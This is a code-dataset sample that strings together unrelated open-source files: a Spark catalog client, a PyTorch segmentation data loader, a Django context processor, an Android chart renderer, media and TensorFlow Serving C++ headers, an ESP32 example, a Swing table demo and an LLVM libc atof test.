private: friend class ctkCmdLineModuleXmlProgressWatcherPrivate; Q_PRIVATE_SLOT(d, void _q_readyRead()) Q_PRIVATE_SLOT(d, void _q_readyReadError()) QScopedPointer<ctkCmdLineModuleXmlProgressWatcherPrivate> d; }; #endif // CTKCMDLINEMODULEXMLPROGRESSWATCHER_H
677
464
from .action import TaskRefuse, DisconnectionRefuse, ConnectionRefuse, TaskFail from .slave import Slave
26
1,016
package com.thinkbiganalytics.kylo.catalog.spark; /*- * #%L * Kylo Catalog for Spark 2 * %% * Copyright (C) 2017 - 2018 ThinkBig Analytics * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import com.thinkbiganalytics.kylo.catalog.api.KyloCatalogClient; import com.thinkbiganalytics.kylo.catalog.spi.DataSetProvider; import org.apache.spark.sql.Dataset; import org.apache.spark.sql.Row; import org.apache.spark.sql.SparkSession; import java.util.List; import javax.annotation.Nonnull; /** * Implementation of {@link KyloCatalogClient} that supports Spark 2. */ public class KyloCatalogClientV2 extends AbstractKyloCatalogClient<Dataset<Row>> { /** * Spark session */ @Nonnull private final SparkSession sparkSession; /** * Constructs a {@code KyloCatalogClientV2} using the specified Spark session and data set providers. */ KyloCatalogClientV2(@Nonnull final SparkSession sparkSession, @Nonnull final List<DataSetProvider<Dataset<Row>>> dataSetProviders) { super(sparkSession.sparkContext(), dataSetProviders); this.sparkSession = sparkSession; } /** * Gets the Spark session. */ @Nonnull public SparkSession getSparkSession() { return sparkSession; } @Override protected boolean isSparkStopped() { return sparkSession.sparkContext().isStopped(); } }
630
9,680
<reponame>dutxubo/nni<filename>examples/trials/kaggle-tgs-salt/loader.py # Copyright (c) Microsoft Corporation # All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, # to any person obtaining a copy of this software and associated # documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and # to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING # BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import os, cv2, glob import numpy as np from PIL import Image import torch import torch.utils.data as data from torchvision import datasets, models, transforms from utils import read_masks, get_test_meta, get_nfold_split import augmentation as aug from settings import * class ImageDataset(data.Dataset): def __init__(self, train_mode, meta, augment_with_target=None, image_augment=None, image_transform=None, mask_transform=None): self.augment_with_target = augment_with_target self.image_augment = image_augment self.image_transform = image_transform self.mask_transform = mask_transform self.train_mode = train_mode self.meta = meta self.img_ids = meta[ID_COLUMN].values self.salt_exists = meta['salt_exists'].values self.is_train = meta['is_train'].values if self.train_mode: self.mask_filenames = meta[Y_COLUMN].values def __getitem__(self, index): base_img_fn = '{}.png'.format(self.img_ids[index]) if self.is_train[index]: #self.train_mode: img_fn = os.path.join(TRAIN_IMG_DIR, base_img_fn) else: img_fn = os.path.join(TEST_IMG_DIR, base_img_fn) img = self.load_image(img_fn) if self.train_mode: base_mask_fn = '{}.png'.format(self.img_ids[index]) if self.is_train[index]: mask_fn = os.path.join(TRAIN_MASK_DIR, base_mask_fn) else: mask_fn = os.path.join(TEST_DIR, 'masks', base_mask_fn) mask = self.load_image(mask_fn, True) img, mask = self.aug_image(img, mask) return img, mask, self.salt_exists[index] else: img = self.aug_image(img) return [img] def aug_image(self, img, mask=None): if mask is not None: if self.augment_with_target is not None: img, mask = self.augment_with_target(img, mask) if self.image_augment is not None: img = self.image_augment(img) if self.mask_transform is not None: mask = self.mask_transform(mask) if self.image_transform is not None: img = self.image_transform(img) return img, mask else: if self.image_augment is not None: img = self.image_augment(img) if self.image_transform is not None: img = self.image_transform(img) return img def load_image(self, img_filepath, grayscale=False): image = Image.open(img_filepath, 'r') if not grayscale: image = image.convert('RGB') else: image = image.convert('L').point(lambda x: 0 if x < 128 else 1, 'L') return image def __len__(self): return len(self.img_ids) def collate_fn(self, batch): imgs = [x[0] for x in batch] inputs = torch.stack(imgs) if self.train_mode: masks = [x[1] for x in batch] labels = torch.stack(masks) salt_target = [x[2] for x in batch] return inputs, labels, torch.FloatTensor(salt_target) else: return inputs def mask_to_tensor(x): x = np.array(x).astype(np.float32) x = np.expand_dims(x, axis=0) x = torch.from_numpy(x) return x img_transforms = [ transforms.Grayscale(num_output_channels=3), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) ] def get_tta_transforms(index, pad_mode): tta_transforms = { 0: [], 1: [transforms.RandomHorizontalFlip(p=2.)], 2: [transforms.RandomVerticalFlip(p=2.)], 3: [transforms.RandomHorizontalFlip(p=2.), transforms.RandomVerticalFlip(p=2.)] } if pad_mode == 'resize': return transforms.Compose([transforms.Resize((H, W)), *(tta_transforms[index]), *img_transforms]) else: return transforms.Compose([*(tta_transforms[index]), *img_transforms]) def get_image_transform(pad_mode): if pad_mode == 'resize': return transforms.Compose([transforms.Resize((H, W)), *img_transforms]) else: return transforms.Compose(img_transforms) def get_mask_transform(pad_mode): if pad_mode == 'resize': return transforms.Compose( [ transforms.Resize((H, W)), transforms.Lambda(mask_to_tensor), ] ) else: return transforms.Compose( [ transforms.Lambda(mask_to_tensor), ] ) def get_img_mask_augments(pad_mode, depths_channel=False): if depths_channel: affine_aug = aug.RandomAffineWithMask(5, translate=(0.1, 0.), scale=(0.9, 1.1), shear=None) else: affine_aug = aug.RandomAffineWithMask(15, translate=(0.1, 0.1), scale=(0.9, 1.1), shear=None) if pad_mode == 'resize': img_mask_aug_train = aug.Compose([ aug.RandomHFlipWithMask(), affine_aug ]) img_mask_aug_val = None else: img_mask_aug_train = aug.Compose([ aug.PadWithMask((28, 28), padding_mode=pad_mode), aug.RandomHFlipWithMask(), affine_aug, aug.RandomResizedCropWithMask(H, scale=(1., 1.), ratio=(1., 1.)) ]) img_mask_aug_val = aug.PadWithMask((13, 13, 14, 14), padding_mode=pad_mode) return img_mask_aug_train, img_mask_aug_val def get_train_loaders(ifold, batch_size=8, dev_mode=False, pad_mode='edge', meta_version=1, pseudo_label=False, depths=False): train_shuffle = True train_meta, val_meta = get_nfold_split(ifold, nfold=10, meta_version=meta_version) if pseudo_label: test_meta = get_test_meta() train_meta = train_meta.append(test_meta, sort=True) if dev_mode: train_shuffle = False train_meta = train_meta.iloc[:10] val_meta = val_meta.iloc[:10] #print(val_meta[X_COLUMN].values[:5]) #print(val_meta[Y_COLUMN].values[:5]) print(train_meta.shape, val_meta.shape) img_mask_aug_train, img_mask_aug_val = get_img_mask_augments(pad_mode, depths) train_set = ImageDataset(True, train_meta, augment_with_target=img_mask_aug_train, image_augment=transforms.ColorJitter(0.2, 0.2, 0.2, 0.2), image_transform=get_image_transform(pad_mode), mask_transform=get_mask_transform(pad_mode)) train_loader = data.DataLoader(train_set, batch_size=batch_size, shuffle=train_shuffle, num_workers=4, collate_fn=train_set.collate_fn, drop_last=True) train_loader.num = len(train_set) val_set = ImageDataset(True, val_meta, augment_with_target=img_mask_aug_val, image_augment=None, image_transform=get_image_transform(pad_mode), mask_transform=get_mask_transform(pad_mode)) val_loader = data.DataLoader(val_set, batch_size=batch_size, shuffle=False, num_workers=4, collate_fn=val_set.collate_fn) val_loader.num = len(val_set) val_loader.y_true = read_masks(val_meta[ID_COLUMN].values) return train_loader, val_loader def get_test_loader(batch_size=16, index=0, dev_mode=False, pad_mode='edge'): test_meta = get_test_meta() if dev_mode: test_meta = test_meta.iloc[:10] test_set = ImageDataset(False, test_meta, image_augment=None if pad_mode == 'resize' else transforms.Pad((13,13,14,14), padding_mode=pad_mode), image_transform=get_tta_transforms(index, pad_mode)) test_loader = data.DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=4, collate_fn=test_set.collate_fn, drop_last=False) test_loader.num = len(test_set) test_loader.meta = test_set.meta return test_loader depth_channel_tensor = None def get_depth_tensor(pad_mode): global depth_channel_tensor if depth_channel_tensor is not None: return depth_channel_tensor depth_tensor = None if pad_mode == 'resize': depth_tensor = np.zeros((H, W)) for row, const in enumerate(np.linspace(0, 1, H)): depth_tensor[row, :] = const else: depth_tensor = np.zeros((ORIG_H, ORIG_W)) for row, const in enumerate(np.linspace(0, 1, ORIG_H)): depth_tensor[row, :] = const depth_tensor = np.pad(depth_tensor, (14,14), mode=pad_mode) # edge or reflect depth_tensor = depth_tensor[:H, :W] depth_channel_tensor = torch.Tensor(depth_tensor) return depth_channel_tensor def add_depth_channel(img_tensor, pad_mode): ''' img_tensor: N, C, H, W ''' img_tensor[:, 1] = get_depth_tensor(pad_mode) img_tensor[:, 2] = img_tensor[:, 0] * get_depth_tensor(pad_mode) def test_train_loader(): train_loader, val_loader = get_train_loaders(1, batch_size=4, dev_mode=False, pad_mode='edge', meta_version=2, pseudo_label=True) print(train_loader.num, val_loader.num) for i, data in enumerate(train_loader): imgs, masks, salt_exists = data #pdb.set_trace() print(imgs.size(), masks.size(), salt_exists.size()) print(salt_exists) add_depth_channel(imgs, 'resize') print(masks) break #print(imgs) #print(masks) def test_test_loader(): test_loader = get_test_loader(4, pad_mode='resize') print(test_loader.num) for i, data in enumerate(test_loader): print(data.size()) if i > 5: break if __name__ == '__main__': test_test_loader() #test_train_loader() #small_dict, img_ids = load_small_train_ids() #print(img_ids[:10]) #print(get_tta_transforms(3, 'edge'))
5,018
369
<reponame>akshaya9/fosswebsite from promotion.models import JoinApplication def get_application_count(): return len(JoinApplication.objects.filter(is_rejected=False, is_approved=False)) # function to add application_list notification dot to all pages def application_processor(request): application_count = get_application_count() return {'application_count': application_count}
111
1,388
<reponame>keyfour/AnimatedGraphView package com.razerdp.widget.animatedpieview.render; import android.graphics.Canvas; import android.support.annotation.Nullable; import com.razerdp.widget.animatedpieview.IPieView; import com.razerdp.widget.animatedpieview.manager.PieManager; /** * Created by 大灯泡 on 2018/2/1. * <p> * <h3>CN:</h3>渲染器基类 * <p> * <h3>EN:</h3>Base render */ public abstract class BaseRender { protected String TAG = this.getClass().getSimpleName(); IPieView mIPieView; PieManager mPieManager; private volatile boolean isPrepared; public BaseRender(IPieView iPieView) { mIPieView = iPieView; mPieManager = iPieView.getManager(); mPieManager.registerRender(this); } public void draw(Canvas canvas) { if (!isPrepared) return; onDraw(canvas); } public final void prepare() { prepare(null); } public final void prepare(@Nullable final OnPrepareFinishListener l) { isPrepared = false; reset(); mIPieView.getPieView().post(new Runnable() { @Override public void run() { isPrepared = onPrepare(); if (isPrepared) { handlePrepareFinish(l); } } }); } public void destroy() { onDestroy(); mPieManager.unRegisterRender(this); } public abstract void reset(); public abstract boolean onPrepare(); public abstract void onSizeChanged(int width, int height, int paddingLeft, int paddingTop, int paddingRight, int paddingBottom); public abstract void onDraw(Canvas canvas); public abstract void onDestroy(); public void callInvalidate() { mIPieView.onCallInvalidate(); } protected void handlePrepareFinish(OnPrepareFinishListener l) { if (l != null) { boolean handled = l.onPrepareFin(); if (handled) return; } callInvalidate(); } public interface OnPrepareFinishListener { boolean onPrepareFin(); } }
880
575
// Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef MEDIA_GPU_V4L2_V4L2_VP9_ACCELERATOR_LEGACY_H_ #define MEDIA_GPU_V4L2_V4L2_VP9_ACCELERATOR_LEGACY_H_ #include <vector> #include "base/callback.h" #include "base/macros.h" #include "base/memory/scoped_refptr.h" #include "media/filters/vp9_parser.h" #include "media/gpu/vp9_decoder.h" namespace media { class V4L2DecodeSurface; class V4L2DecodeSurfaceHandler; class V4L2Device; class V4L2LegacyVP9Accelerator : public VP9Decoder::VP9Accelerator { public: explicit V4L2LegacyVP9Accelerator(V4L2DecodeSurfaceHandler* surface_handler, V4L2Device* device); ~V4L2LegacyVP9Accelerator() override; // VP9Decoder::VP9Accelerator implementation. scoped_refptr<VP9Picture> CreateVP9Picture() override; Status SubmitDecode(scoped_refptr<VP9Picture> pic, const Vp9SegmentationParams& segm_params, const Vp9LoopFilterParams& lf_params, const Vp9ReferenceFrameVector& reference_frames, base::OnceClosure done_cb) override; bool OutputPicture(scoped_refptr<VP9Picture> pic) override; bool GetFrameContext(scoped_refptr<VP9Picture> pic, Vp9FrameContext* frame_ctx) override; bool IsFrameContextRequired() const override; private: scoped_refptr<V4L2DecodeSurface> VP9PictureToV4L2DecodeSurface( VP9Picture* pic); bool device_needs_frame_context_; V4L2DecodeSurfaceHandler* const surface_handler_; V4L2Device* const device_; DISALLOW_COPY_AND_ASSIGN(V4L2LegacyVP9Accelerator); }; } // namespace media #endif // MEDIA_GPU_V4L2_V4L2_VP9_ACCELERATOR_LEGACY_H_
777
8,747
/* Hello World Example This example code is in the Public Domain (or CC0 licensed, at your option.) Unless required by applicable law or agreed to in writing, this software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. */ #include <stdio.h> #include "freertos/FreeRTOS.h" #include "freertos/task.h" #include "esp_system.h" #include "esp_spi_flash.h" void app_main(void) { printf("Hello world!\n"); /* Print chip information */ esp_chip_info_t chip_info; esp_chip_info(&chip_info); printf("This is ESP32 chip with %d CPU cores, WiFi%s%s, ", chip_info.cores, (chip_info.features & CHIP_FEATURE_BT) ? "/BT" : "", (chip_info.features & CHIP_FEATURE_BLE) ? "/BLE" : ""); printf("silicon revision %d, ", chip_info.revision); printf("%dMB %s flash\n", spi_flash_get_chip_size() / (1024 * 1024), (chip_info.features & CHIP_FEATURE_EMB_FLASH) ? "embedded" : "external"); for (int i = 10; i >= 0; i--) { printf("Restarting in %d seconds...\n", i); vTaskDelay(1000 / portTICK_PERIOD_MS); } printf("Restarting now.\n"); fflush(stdout); esp_restart(); }
507
388
<reponame>OctaviantoVyan/jwswing<filename>LargeCellEditor/src/java/example/MainPanel.java // -*- mode:java; encoding:utf-8 -*- // vim:set fileencoding=utf-8: // @homepage@ package example; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.KeyEvent; import java.awt.event.MouseAdapter; import java.awt.event.MouseEvent; import java.awt.image.BufferedImage; import java.util.Objects; import javax.swing.*; import javax.swing.table.DefaultTableCellRenderer; import javax.swing.table.DefaultTableModel; import javax.swing.table.JTableHeader; import javax.swing.table.TableColumn; import javax.swing.table.TableColumnModel; import javax.swing.table.TableModel; public final class MainPanel extends JPanel { private MainPanel() { super(new BorderLayout()); ListModel<IconItem> list = makeIconList(); TableModel model = makeIconTableModel(list); JTable table = new IconTable(model, list); JPanel p = new JPanel(new GridBagLayout()); p.add(table, new GridBagConstraints()); p.setBackground(Color.WHITE); add(p); setPreferredSize(new Dimension(320, 240)); } private static ListModel<IconItem> makeIconList() { DefaultListModel<IconItem> list = new DefaultListModel<>(); list.addElement(new IconItem("wi0009")); list.addElement(new IconItem("wi0054")); list.addElement(new IconItem("wi0062")); list.addElement(new IconItem("wi0063")); list.addElement(new IconItem("wi0064")); list.addElement(new IconItem("wi0096")); list.addElement(new IconItem("wi0111")); list.addElement(new IconItem("wi0122")); list.addElement(new IconItem("wi0124")); return list; } private static <E extends IconItem> TableModel makeIconTableModel(ListModel<E> list) { Object[][] data = { {list.getElementAt(0), list.getElementAt(1), list.getElementAt(2)}, {list.getElementAt(3), list.getElementAt(4), list.getElementAt(5)}, {list.getElementAt(6), list.getElementAt(7), list.getElementAt(8)} }; return new DefaultTableModel(data, null) { @Override public boolean isCellEditable(int row, int column) { return false; } @Override public int getColumnCount() { return 3; } }; } public static void main(String[] args) { EventQueue.invokeLater(MainPanel::createAndShowGui); } private static void createAndShowGui() { try { UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName()); } catch (ClassNotFoundException | InstantiationException | IllegalAccessException | UnsupportedLookAndFeelException ex) { ex.printStackTrace(); Toolkit.getDefaultToolkit().beep(); } JFrame frame = new JFrame("@title@"); frame.setDefaultCloseOperation(WindowConstants.EXIT_ON_CLOSE); frame.getContentPane().add(new MainPanel()); frame.pack(); frame.setResizable(false); frame.setLocationRelativeTo(null); frame.setVisible(true); } } class IconItem { public final ImageIcon large; public final ImageIcon small; protected IconItem(String str) { large = new ImageIcon(Objects.requireNonNull(getClass().getResource(str + "-48.png"))); small = new ImageIcon(Objects.requireNonNull(getClass().getResource(str + "-24.png"))); } } class IconTableCellRenderer extends DefaultTableCellRenderer { @Override public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { setIcon(((IconItem) value).large); setHorizontalAlignment(SwingConstants.CENTER); return this; } } class IconTable extends JTable { protected static final int CELL_SIZE = 50; protected static final int OFFSET = 4; protected final JList<IconItem> editor; protected final JComponent glassPane = new JComponent() { @Override public void setVisible(boolean flag) { super.setVisible(flag); setFocusTraversalPolicyProvider(flag); setFocusCycleRoot(flag); } @Override protected void paintComponent(Graphics g) { g.setColor(new Color(0x64_FF_FF_FF, true)); g.fillRect(0, 0, getWidth(), getHeight()); BufferedImage buffer = new BufferedImage(getWidth(), getHeight(), BufferedImage.TYPE_INT_ARGB); Graphics2D g2 = buffer.createGraphics(); g2.setRenderingHint(RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON); g2.setComposite(AlphaComposite.getInstance(AlphaComposite.SRC_OVER, .15f)); g2.setPaint(Color.BLACK); Rectangle r = editor.getBounds(); for (int i = 0; i < OFFSET; i++) { g2.fillRoundRect(r.x - i, r.y + OFFSET, r.width + i + i, r.height - OFFSET + i, 5, 5); } g2.dispose(); g.drawImage(buffer, 0, 0, this); } }; protected IconTable(TableModel model, ListModel<IconItem> list) { super(model); setDefaultRenderer(Object.class, new IconTableCellRenderer()); setSelectionMode(ListSelectionModel.SINGLE_SELECTION); addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { startEditing(); } }); editor = new EditorFromList<>(list); KeyStroke key = KeyStroke.getKeyStroke(KeyEvent.VK_ESCAPE, 0); editor.getInputMap(JComponent.WHEN_FOCUSED).put(key, "cancel-editing"); editor.getActionMap().put("cancel-editing", new AbstractAction() { @Override public void actionPerformed(ActionEvent e) { cancelEditing(); } }); // editor.addKeyListener(new KeyAdapter() { // @Override public void keyPressed(KeyEvent e) { // if (e.getKeyCode() == KeyEvent.VK_ESCAPE) { // cancelEditing(); // } // } // }); editor.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { Point p = e.getPoint(); IconItem item = editor.getModel().getElementAt(editor.locationToIndex(p)); setValueAt(item, getSelectedRow(), getSelectedColumn()); cancelEditing(); } }); glassPane.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { // Point pt = e.getPoint(); // if (!editor.getBounds().contains(pt)) { // cancelEditing(); // } cancelEditing(); } }); glassPane.setFocusTraversalPolicy(new DefaultFocusTraversalPolicy() { @Override public boolean accept(Component c) { return Objects.equals(c, editor); } }); glassPane.add(editor); glassPane.setVisible(false); } @Override public void updateUI() { super.updateUI(); setRowHeight(CELL_SIZE); JTableHeader tableHeader = getTableHeader(); tableHeader.setResizingAllowed(false); tableHeader.setReorderingAllowed(false); TableColumnModel m = getColumnModel(); for (int i = 0; i < m.getColumnCount(); i++) { TableColumn col = m.getColumn(i); col.setMinWidth(CELL_SIZE); col.setMaxWidth(CELL_SIZE); } setBorder(BorderFactory.createLineBorder(Color.BLACK)); } public void startEditing() { getRootPane().setGlassPane(glassPane); Dimension d = editor.getPreferredSize(); editor.setSize(d); int sr = getSelectedRow(); int sc = getSelectedColumn(); Rectangle r = getCellRect(sr, sc, true); Point p = SwingUtilities.convertPoint(this, r.getLocation(), glassPane); p.translate((r.width - d.width) / 2, (r.height - d.height) / 2); editor.setLocation(p); glassPane.setVisible(true); editor.setSelectedValue(getValueAt(sr, sc), true); editor.requestFocusInWindow(); } protected void cancelEditing() { glassPane.setVisible(false); } } class EditorFromList<E extends IconItem> extends JList<E> { private static final int INS = 2; private final Dimension dim; private transient RollOverListener handler; protected int rollOverRowIndex = -1; protected EditorFromList(ListModel<E> model) { super(model); ImageIcon icon = model.getElementAt(0).small; int iw = INS + icon.getIconWidth(); int ih = INS + icon.getIconHeight(); dim = new Dimension(iw * 3 + INS, ih * 3 + INS); setFixedCellWidth(iw); setFixedCellHeight(ih); } @Override public Dimension getPreferredSize() { return dim; } @Override public void updateUI() { removeMouseMotionListener(handler); removeMouseListener(handler); super.updateUI(); handler = new RollOverListener(); addMouseMotionListener(handler); addMouseListener(handler); setBorder(BorderFactory.createLineBorder(Color.BLACK)); setLayoutOrientation(JList.HORIZONTAL_WRAP); setVisibleRowCount(0); JLabel renderer = new JLabel(); Color selectedColor = new Color(0xC8_C8_FF); setCellRenderer((list, value, index, isSelected, cellHasFocus) -> { renderer.setOpaque(true); renderer.setHorizontalAlignment(SwingConstants.CENTER); if (index == rollOverRowIndex) { renderer.setBackground(getSelectionBackground()); } else if (isSelected) { renderer.setBackground(selectedColor); } else { renderer.setBackground(getBackground()); } renderer.setIcon(value.small); return renderer; }); } private class RollOverListener extends MouseAdapter { @Override public void mouseExited(MouseEvent e) { rollOverRowIndex = -1; e.getComponent().repaint(); } @Override public void mouseMoved(MouseEvent e) { int row = locationToIndex(e.getPoint()); if (row != rollOverRowIndex) { rollOverRowIndex = row; e.getComponent().repaint(); } } } }
3,633
338
<reponame>ayumi-cloud/browscap<gh_stars>100-1000 { "China-Tablet I101MTK": { "type": "tablet", "properties": { "Device_Name": "I101MTK", "Device_Code_Name": "I101MTK", "Device_Maker": "China Tablet", "Device_Pointing_Method": "touchscreen", "Device_Brand_Name": "China Tablet" }, "standard": true } }
160
5,791
/* Copyright 2016 Google Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_SERVING_BATCHING_BATCH_SCHEDULER_RETRIER_H_ #define TENSORFLOW_SERVING_BATCHING_BATCH_SCHEDULER_RETRIER_H_ #include <stddef.h> #include <cstddef> #include <memory> #include <utility> #include "tensorflow/core/kernels/batching_util/batch_scheduler.h" #include "tensorflow/core/lib/core/errors.h" #include "tensorflow/core/platform/env.h" #include "tensorflow/core/platform/macros.h" namespace tensorflow { namespace serving { // A wrapper around another BatchScheduler that automatically retries // Schedule() requests. Returns an UNAVAILABLE error only after retry attempts // have failed (based on parameters that govern the maximum number of retries // and the retry time interval). template <typename TaskType> class BatchSchedulerRetrier : public BatchScheduler<TaskType> { public: struct Options { // The maximum amount of time to spend retrying 'wrapped_->Schedule()' // calls, in microseconds. int64_t max_time_micros = 10 * 1000 /* 10 milliseconds */; // The amount of time to pause between retry attempts, in microseconds. int64_t retry_delay_micros = 100; // The environment to use for time and sleeping. Env* env = Env::Default(); }; static Status Create( const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped, std::unique_ptr<BatchSchedulerRetrier<TaskType>>* result); ~BatchSchedulerRetrier() override = default; Status Schedule(std::unique_ptr<TaskType>* task) override; size_t NumEnqueuedTasks() const override; size_t SchedulingCapacity() const override; size_t max_task_size() const override { return wrapped_->max_task_size(); } private: BatchSchedulerRetrier(const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped); const Options options_; std::unique_ptr<BatchScheduler<TaskType>> wrapped_; TF_DISALLOW_COPY_AND_ASSIGN(BatchSchedulerRetrier); }; ////////// // Implementation details follow. API users need not read. template <typename TaskType> Status BatchSchedulerRetrier<TaskType>::Create( const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped, std::unique_ptr<BatchSchedulerRetrier<TaskType>>* result) { if (options.max_time_micros < 0) { return errors::InvalidArgument("max_time_micros must be non-negative; was ", options.max_time_micros); } if (options.retry_delay_micros < 0) { return errors::InvalidArgument( "retry_delay_micros must be non-negative; was ", options.retry_delay_micros); } result->reset(new BatchSchedulerRetrier(options, std::move(wrapped))); return Status::OK(); } template <typename TaskType> Status BatchSchedulerRetrier<TaskType>::Schedule( std::unique_ptr<TaskType>* task) { Status status; const uint64_t start_time_micros = options_.env->NowMicros(); for (;;) { status = wrapped_->Schedule(task); if (status.code() != error::UNAVAILABLE) { // We either succeeded, or got a permanent (non-retriable) error. break; } if ((options_.env->NowMicros() + options_.retry_delay_micros) - start_time_micros >= options_.max_time_micros) { // We don't have time in our budget to retry again. break; } options_.env->SleepForMicroseconds(options_.retry_delay_micros); } return status; } template <typename TaskType> size_t BatchSchedulerRetrier<TaskType>::NumEnqueuedTasks() const { return wrapped_->NumEnqueuedTasks(); } template <typename TaskType> size_t BatchSchedulerRetrier<TaskType>::SchedulingCapacity() const { return wrapped_->SchedulingCapacity(); } template <typename TaskType> BatchSchedulerRetrier<TaskType>::BatchSchedulerRetrier( const Options& options, std::unique_ptr<BatchScheduler<TaskType>> wrapped) : options_(options), wrapped_(std::move(wrapped)) {} } // namespace serving } // namespace tensorflow #endif // TENSORFLOW_SERVING_BATCHING_BATCH_SCHEDULER_RETRIER_H_
1,614
344
/* * Copyright (c) 2020 The WebRTC project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #include "modules/audio_processing/include/audio_processing.h" #include <memory> #include "modules/audio_processing/audio_processing_impl.h" #include "rtc_base/ref_counted_object.h" namespace webrtc { AudioProcessingBuilder::AudioProcessingBuilder() = default; AudioProcessingBuilder::~AudioProcessingBuilder() = default; AudioProcessing* AudioProcessingBuilder::Create() { webrtc::Config config; return Create(config); } AudioProcessing* AudioProcessingBuilder::Create(const webrtc::Config& config) { #ifdef WEBRTC_EXCLUDE_AUDIO_PROCESSING_MODULE // Implementation returning a null pointer for using when the APM is excluded // from the build.. return nullptr; #else // Standard implementation. return new rtc::RefCountedObject<AudioProcessingImpl>( config, std::move(capture_post_processing_), std::move(render_pre_processing_), std::move(echo_control_factory_), std::move(echo_detector_), std::move(capture_analyzer_)); #endif } } // namespace webrtc
432
605
//===-- Unittests for atof ------------------------------------------------===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "src/__support/FPUtil/FPBits.h" #include "src/stdlib/atof.h" #include "utils/UnitTest/Test.h" #include <errno.h> #include <limits.h> #include <stddef.h> // This is just a simple test to make sure that this function works at all. It's // functionally identical to strtod so the bulk of the testing is there. TEST(LlvmLibcAToFTest, SimpleTest) { __llvm_libc::fputil::FPBits<double> expected_fp = __llvm_libc::fputil::FPBits<double>(uint64_t(0x405ec00000000000)); errno = 0; double result = __llvm_libc::atof("123"); __llvm_libc::fputil::FPBits<double> actual_fp = __llvm_libc::fputil::FPBits<double>(result); EXPECT_EQ(actual_fp.bits, expected_fp.bits); EXPECT_EQ(actual_fp.get_sign(), expected_fp.get_sign()); EXPECT_EQ(actual_fp.get_exponent(), expected_fp.get_exponent()); EXPECT_EQ(actual_fp.get_mantissa(), expected_fp.get_mantissa()); EXPECT_EQ(errno, 0); } TEST(LlvmLibcAToFTest, FailedParsingTest) { __llvm_libc::fputil::FPBits<double> expected_fp = __llvm_libc::fputil::FPBits<double>(uint64_t(0)); errno = 0; double result = __llvm_libc::atof("???"); __llvm_libc::fputil::FPBits<double> actual_fp = __llvm_libc::fputil::FPBits<double>(result); EXPECT_EQ(actual_fp.bits, expected_fp.bits); EXPECT_EQ(actual_fp.get_sign(), expected_fp.get_sign()); EXPECT_EQ(actual_fp.get_exponent(), expected_fp.get_exponent()); EXPECT_EQ(actual_fp.get_mantissa(), expected_fp.get_mantissa()); EXPECT_EQ(errno, 0); }
724
575
